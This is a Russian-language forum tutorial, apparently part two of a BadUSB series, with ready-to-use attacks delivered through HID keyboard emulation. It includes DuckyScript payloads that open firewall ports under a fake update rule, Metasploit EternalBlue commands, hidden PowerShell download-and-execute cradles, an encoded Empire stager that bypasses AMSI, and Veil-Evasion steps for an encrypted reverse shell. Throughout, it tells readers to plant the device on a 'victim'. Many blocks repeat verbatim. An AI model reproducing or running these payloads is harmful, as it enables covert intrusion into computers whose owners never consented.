Вступление.
Всем привет! Как и обещал, выкладываю 2 часть статьи про BadUSB. Она будет меньше предыдущей и посвещена только конкретным примерам атак.
Я уже писал про важность таймингов. Теперь объясню подробнее, почему они важны в HID-эмуляции. Есть такая команда - DELAY, к ней задается значение в миллисекундах. Например DELAY 1500 - наша HID-клавиатура ждет 1500 миллисекунд (1,5 секунды) перед выполнением следующей команды.
Когда будете писать собственные Ducky-скрипты, или отлаживать чужие (например для другой ОС), Вы обязательно столкнетесь с тем, что часто все будет работать совсем не так, как должно. И объясняется это следующей причиной - HID-клавиатура слишком быстро вбивает значения, а система не успевает их обработать.
Может случиться и такое, что целевая машина периодически зависает и ваша команда опять же не сработает как нужно. Так что, если что-то не так, не спешите писать, что автор пидорас, а разберитесь всебе - может быть пидорас - это Вы? коде. Иногда значения DELAY нужно добавлять чаще, менять на более высокие - если Вам нужна увеличенная скорость вбива, или более низкие - для лучшей стабильности. Так же нужно учесть время установки драйверов, поэтому для надежности можно ставить значения побольше - 2000-3000.
Еще раз напомню, что нету волшебной кнопки"заработать денег" "взломать". Атаки, которые я покажу ниже, созданы с учетом уязвимостей конкретных систем. Если Вы думаете, что можно залить payload и использовать его с любой версией Windows, то спешу Вас огорчить. Никак нет. Всем известно, что перед тем, как атаковать конкретную систему, надо провести разведку. Про это здесь я подробно писать не буду, это тема отдельной статьи. Например перед тем, как заряжать EnternalBlue, желательно ответить себе на вопрос - "А уязвима ли наша машина, или уже пропатчена?".
Открываем порты для CVE-2017-0144.
Работаем с web_delivery.
PowerShell Empire.
Ответы на вопросы.
Вопрос: "Как взламывать ПК не из локальной сети, а из глобальной?
P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.
P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.
Всем привет! Как и обещал, выкладываю 2 часть статьи про BadUSB. Она будет меньше предыдущей и посвещена только конкретным примерам атак.
Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.
Ссылки в рамках данного мануала не являются рекламой.
В прошлой статье я писал про синтаксис DuckyScript, если вы не изучили его, то дальше можно не читать, дубликаты я делать не люблю. Так же мои статьи не предназначены для даунов, которые осилят тупо копирование команд в cmd, это не FAQ по Metasploit Framework и прочим инструментам для пентеста, не ждите здесь скриншотов и видео, мне лень их делать.
Я уже писал про важность таймингов. Теперь объясню подробнее, почему они важны в HID-эмуляции. Есть такая команда - DELAY, к ней задается значение в миллисекундах. Например DELAY 1500 - наша HID-клавиатура ждет 1500 миллисекунд (1,5 секунды) перед выполнением следующей команды.
Когда будете писать собственные Ducky-скрипты, или отлаживать чужие (например для другой ОС), Вы обязательно столкнетесь с тем, что часто все будет работать совсем не так, как должно. И объясняется это следующей причиной - HID-клавиатура слишком быстро вбивает значения, а система не успевает их обработать.
Может случиться и такое, что целевая машина периодически зависает и ваша команда опять же не сработает как нужно. Так что, если что-то не так, не спешите писать, что автор пидорас, а разберитесь в
Еще раз напомню, что нету волшебной кнопки
Открываем порты для CVE-2017-0144.
Мы будем работать с Kali Linux, ОС на целевой машине - Windows 7 x64. Для доставки добра мы используем смартфон с NetHunter на борту, флешку с Phison 2251-03 или USB Rubber Ducky (актуально для других девайсов с поддержкой DuckyScript, изучите особенности синтаксиса и компиляции payload на своем устройстве).
1. Разведка показала, что ПК уязвим к EnternalBlue, а порты 445 и 135, нужные нам для атаки, закрыты.
2. Покидываем жертве нашу флешку или под любым предлогом втыкаем наш смартфон в ПК (код на среднем компьютере срабатывает за 5 секунд). Так же отмечу, что тайминги в моем скрипте выставлены для Nexus 5 и ноутбука со средними характеристиками. Их нужно будет скорректировать под Ваши устройства.
3. Profit! мы получили сессию
1. Разведка показала, что ПК уязвим к EnternalBlue, а порты 445 и 135, нужные нам для атаки, закрыты.
2. Покидываем жертве нашу флешку или под любым предлогом втыкаем наш смартфон в ПК (код на среднем компьютере срабатывает за 5 секунд). Так же отмечу, что тайминги в моем скрипте выставлены для Nexus 5 и ноутбука со средними характеристиками. Их нужно будет скорректировать под Ваши устройства.
DELAY 100 // в "боевом режиме", надо ставить больше, ведь еще должны установиться драйвера. Можно использовать DEFAULT_DELAY
GUI r
DELAY 100
STRING powershell -Command "Start-Process cmd -Verb RunAs"
ENTER
DELAY 500 // это на быстрой машине, для тестов на других, старых ноутбуках я увеличил значение до 7000 для надежности, этого должно везде хватить
LEFTARROW
ENTER
DELAY 100
STRING color F8
STRING mode con:cols=14 lines=14 lines=1
DELAY 100
STRING netsh advfirewall firewall add rule name="Internet Explorer Update" protocol="TCP" localport=445,135 action=allow dir=IN
ENTER
STRING exit
P.S. далее состав скрипта зависит от Вашей фантазии, можно записать определенные батники в autorun и т.д.
GUI r
DELAY 100
STRING powershell -Command "Start-Process cmd -Verb RunAs"
ENTER
DELAY 500 // это на быстрой машине, для тестов на других, старых ноутбуках я увеличил значение до 7000 для надежности, этого должно везде хватить
LEFTARROW
ENTER
DELAY 100
STRING color F8
STRING mode con:cols=14 lines=14 lines=1
DELAY 100
STRING netsh advfirewall firewall add rule name="Internet Explorer Update" protocol="TCP" localport=445,135 action=allow dir=IN
ENTER
STRING exit
P.S. далее состав скрипта зависит от Вашей фантазии, можно записать определенные батники в autorun и т.д.
# msfconsole
# use exploit/windows/smb/ms17_010_eternalblue
# set payload windows/x64/meterpreter/reverse_tcp
# set rhost 192.168.1.48 //это атакуемая машина
# set lhost 192.168.1.42 //это наша машина
# exploit
meterpreter >
# use exploit/windows/smb/ms17_010_eternalblue
# set payload windows/x64/meterpreter/reverse_tcp
# set rhost 192.168.1.48 //это атакуемая машина
# set lhost 192.168.1.42 //это наша машина
# exploit
meterpreter >
3. Profit! мы получили сессию
Работаем с web_delivery.
Общая схема работы будет, как и в предыдущем примере. Плюсы модуля заключаются в высокой скорости и низкой вероятности детектирования AV. Он ничего не пишет на диск, так что не оставит следов по окончании работы. На этот раз нашей целью будет Windows 10 x64. Доставлять код будем так же с помощью смартфона, прошитого NetHunter, зараженной флешки или USB Rubber Ducky.
Profit!
# msfconsole
# use exploit/multi/script/web_delivery
# set LHOST 192.168.0.5 //Ваше значение, указываем программе, откуда брать бинарники
# set LPORT 443
# set URIPATH /
# set TARGET 2
# set PAYLOAD windows/meterpreter/reverse_https
# exploit
# use exploit/multi/script/web_delivery
# set LHOST 192.168.0.5 //Ваше значение, указываем программе, откуда брать бинарники
# set LPORT 443
# set URIPATH /
# set TARGET 2
# set PAYLOAD windows/meterpreter/reverse_https
# exploit
powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://192.168.0.5:8080/');
Может пригодится для удобства остановки и возобновления прослушки порта. Файл назовем usb.rc
# use exploit/multi/script/web_delivery
# set LHOST 192.168.0.5
# set LPORT 443
# set URIPATH /
# set TARGET 2
#s et PAYLOAD windows/meterpreter/reverse_https
# exploit
# use exploit/multi/script/web_delivery
# set LHOST 192.168.0.5
# set LPORT 443
# set URIPATH /
# set TARGET 2
#s et PAYLOAD windows/meterpreter/reverse_https
# exploit
DELAY 100
GUI r
DELAY 200
STRING powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://192.168.0.5:8080/');
ENTER
GUI r
DELAY 200
STRING powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://192.168.0.5:8080/');
ENTER
Profit!
Для тех, у кого возникнут проблемы с работой web_delivery - тут есть общая информация по работе с модулем. https://codeby.net/forum/threads/powershell-dlja-xakera-chast-iv-web-delivery-dostavka-poleznoj-nagruzki-cherez-web.58787/
Так же можно модифицировать вышеописанный метод, залив payload на pastebin или github.
Так же можно модифицировать вышеописанный метод, залив payload на pastebin или github.
PowerShell Empire.
Тут почти то же самое, что и в случае с web_delivery. Только другие опции и интерфейс.
# cd tools
# git clone https://github.com/adaptivethreat/Empire.git
# cd Empire
# cd setup
# ./install.sh
# ./empire
# git clone https://github.com/adaptivethreat/Empire.git
# cd Empire
# cd setup
# ./install.sh
# ./empire
# listeners
# set Name Host78
# list
# usestager Launcher
# set Listener Host78
# exe
# execute
# set Name Host78
# list
# usestager Launcher
# set Listener Host78
# exe
# execute
STRING powershell -W Hidden -nop -noni -enc WwBSAGUAZgBdAC4AQQBzAHMARQBNAGIATAB5AC4ARwBFAFQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkARQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBsAFUAZQAoACQAbgBVAEwAbAAsACQAdABSAFUAZQApAH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAcgB2AGkAQwBFAFAAbwBJAE4AdABNAEEATgBBAEcAZQBSAF0AOgA6AEUAWABwAEUAYwB0ADEAMAAwAEMATwBOAFQASQBOAFUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBiAEoAZQBDAFQAIABTAHkAUwB0AEUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAQQBkAEUAUgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAEUAQgBSAEUAUQB1AGUAcwBUAF0AOgA6AEQARQBGAGEAdQBMAHQAVwBFAEIAUAByAE8AeAB5ADsAJABXAEMALgBQAFIAbwBYAFkALgBDAFIARQBkAGUAbgB0AEkAQQBMAFMAIAA9ACAAWwBTAHkAcwBUAEUATQAuAE4ARQB0AC4AQwByAEUARABlAE4AdABpAEEAbABDAEEAQwBoAGUAXQA6ADoARABFAEYAQQBVAEwAVABOAEUAVABXAE8AUgBrAEMAUgBFAEQAZQBOAHQASQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAEMATwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAWQB0AEUAcwAoACcAYwBJAHAAMABDADwASgAtAHMAbABUAF8AXgBAAGkANABQAEcALAA4AHgAWABGACsAZgBFAFIAMwB2AEQAfgBkACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABFAHIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AeABiADEAcgBKAGoATABuAGwANQBKAGsAMABqADEATgAxAFYAZABoAHgAZwByAE8ANgArAFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABEAGEAVABBAD0AJABXAEMALgBEAE8AdwBOAGwAbwBhAGQARABhAFQAYQAoACQAcwBlAFIAKwAkAHQAKQA7ACQAaQBWAD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAEEAdABBAFsANAAuAC4AJABEAGEAdABhAC4ATABFAG4ARwB0AEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
P.S. Выше я уже писал, что есть способ упростить задачу - залить эту дичь на github или pastebin, и вставить в PoweShell ссылку на скачивание. В этом случае скорость выполнения атаки значительно возрастет.
P.S. Выше я уже писал, что есть способ упростить задачу - залить эту дичь на github или pastebin, и вставить в PoweShell ссылку на скачивание. В этом случае скорость выполнения атаки значительно возрастет.
DELAY 100
GUI r
DELAY 200
STRING //тут код из-под спойлера выше, либо код вида powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/a66i67uyijjhg'
ENTER
GUI r
DELAY 200
STRING //тут код из-под спойлера выше, либо код вида powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/a66i67uyijjhg'
ENTER
Для тех, у кого возникнут проблемы с работой Empire - тут есть общая информация по работе с Фреймворком https://codeby.net/forum/threads/znakomstvo-s-powershell-empire-framework.58469/
Так же можно побаловаться зараженными таблицами Exel и прочим.
Так же можно побаловаться зараженными таблицами Exel и прочим.
Ответы на вопросы.
Вопрос: "Как взламывать ПК не из локальной сети, а из глобальной?
Меня уже несколько раз спаршивали про удаленный доступ. Рассмотрим пример с Veil-Evasion.
Для удаленного доступа нам понадобится статический белый IP. Kali должен находиться за NAT роутера со статическим IP. Подключение к нашему ПК извне будут идти на 443 порт (проброшенный в роутере на локальный адрес Kali.).
У кого динамический адрес - используйте DyDNS.
Для доставки жертве используем RubberDucky, потому, что payload можно поместить прямо на SD. Либо же использовать способы, описанные выше.
# apt-get -y install git
# git clone https://github.com/Veil-Framework/Veil-Evasion.git
# cd Veil-Evasion/
# cd setup
# setup.sh -c
# git clone https://github.com/Veil-Framework/Veil-Evasion.git
# cd Veil-Evasion/
# cd setup
# setup.sh -c
Для удаленного доступа нам понадобится статический белый IP. Kali должен находиться за NAT роутера со статическим IP. Подключение к нашему ПК извне будут идти на 443 порт (проброшенный в роутере на локальный адрес Kali.).
У кого динамический адрес - используйте DyDNS.
# cd /root/Veil-Evasion
# python Veil-Evasion.py
# list
# use 32 // нам нужен python/meterpreter/reverse_https
# set LHOST 37.119.32.125 //Ваш публичный IP
# set LPORT 443 //по умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80)
# set USE_PYHERION Y (используем энкриптор)
# generate (создаем .exe файл) // далее Вводим имя создаваемого файла, Выбираем вторую строку, жмем 2.
После компиляции кода подкидываем флешку жертве
# python Veil-Evasion.py
# list
# use 32 // нам нужен python/meterpreter/reverse_https
# set LHOST 37.119.32.125 //Ваш публичный IP
# set LPORT 443 //по умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80)
# set USE_PYHERION Y (используем энкриптор)
# generate (создаем .exe файл) // далее Вводим имя создаваемого файла, Выбираем вторую строку, жмем 2.
После компиляции кода подкидываем флешку жертве
Для доставки жертве используем RubberDucky, потому, что payload можно поместить прямо на SD. Либо же использовать способы, описанные выше.
P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.
P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.
Последнее редактирование: